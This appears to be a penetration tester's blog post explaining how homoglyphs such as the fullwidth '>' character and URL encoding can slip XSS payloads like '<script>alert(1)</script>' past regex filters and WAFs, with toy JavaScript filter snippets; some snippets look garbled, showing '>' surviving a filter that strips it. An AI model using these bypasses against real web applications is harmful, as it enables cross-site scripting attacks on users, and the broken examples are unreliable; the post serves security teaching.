As with most articles I write, this post comes from a particular engagement where I was tasked with re-testing fixes engineers put in place for a XSS (Cross-Site Scripting) vulnerability. While the details of the exploit will not be discussed here, the bypass technique using homoglyphs are fair game.
What’s a ‘Homoglyph’?
According to Wikipedia,
….a homoglyph is one of two or more graphemes, characters, or glyphs with shapes that appear identical or very similar.
https://en.wikipedia.org/wiki/Homoglyph
What this means in practice is that a homoglyph is a series of shapes or characters that look super similar. When applied to computers, these can be ASCII text characters that very similar. Consider the following example:
domain.com
domàіn.com
Another example could be:
<script>alert(1)</script> // URL-Encoded >: %3E
<script>alert(1)</script> // URL-Encoded >: %EF%BC%9E
Now whether or not you think homoglyphs look the same is up to you, however, computers are sometimes kind of stupid. What you see as an “à” character can actually mean something else to a computer entirely – even a plain old ‘a’ character. The same goes for karats when >
(%EF%BC%9E
) can actually be interpreted as >
(%3E). Different characters, potentially interpreted the same!
Knowing this, homoglyphs can be used to provide ample sets of bypasses for regexes, WAFs (Web Application Firewalls), and various other kinds of validation.
The Defense
Let’s say our target web application has some filtering in place to block malicious characters from being supplied. In this case, script tags are stripped if detected on the client and server. Let’s take a look at a super simple filter written in JavaScript.
var someInput = document.getElementbyId('input'); // <script>alert(1)</script>
someInput.replace(/>/g, "") // replace '>' characters with a blank space
// <scriptalert(1)</script
In the example above, you can see that the >
symbol get stripped based on the regex that detects it. Let’s not get deterred by this, however.
The First Bypass
Let’s consider URL Encoding/Decoding for a moment – the process by which characters are encoded/decoded in a format to be safely transmitted over the internet – the syntax generally follows %
followed by two characters. Characters like @
become %40
, and, for our purposes, >
becomes %3E
.
What happens when you feed encoded characters to an application is that they may be parsed as plain-text, but when they reach the victim’s browser they are interpreted as the encoded characters they are. Meaning, a browser can potentially decode %3E
as >
and see your supplied string as valid HTML.
Now let’s go back to the drawing board.
var someInput = document.getElementbyId('input'); // <script%3Ealert(1)</script%3E
someInput.replace(/>/g, "") // replace '>' characters with a blank space
// <script>alert(1)</script>
Now you’ve done it and the %3E
encoding will be blocked! There’s one more trick up our sleeve.
The Homoglyph Attack
Given we know our application will strip >
and its encoded value of %3E
, we’d want to give Homoglyphs a try. We can also apply this technique to the >
character as well as its encoded value.
Bypassing >
:
var someInput = document.getElementbyId('input'); // <script>alert(1)</script>
someInput.replace(/>/g, "").replace(/%3E/ig,"") // replace '>' characters with a blank space
// <script>alert(1)</script>
Bypassing %3E
:
var someInput = document.getElementbyId('input'); // <script%3Ealert(1)</script%3E
someInput.replace(/>/g, "") // replace '>' characters with a blank space
// <script>alert(1)</script>
So, where else can you take this kind of attack?
While homoglyphs can be used to bypass web application controls for sure, there are other applications such as purchasing look-alike domains or social engineering so feel free to think outside of the box: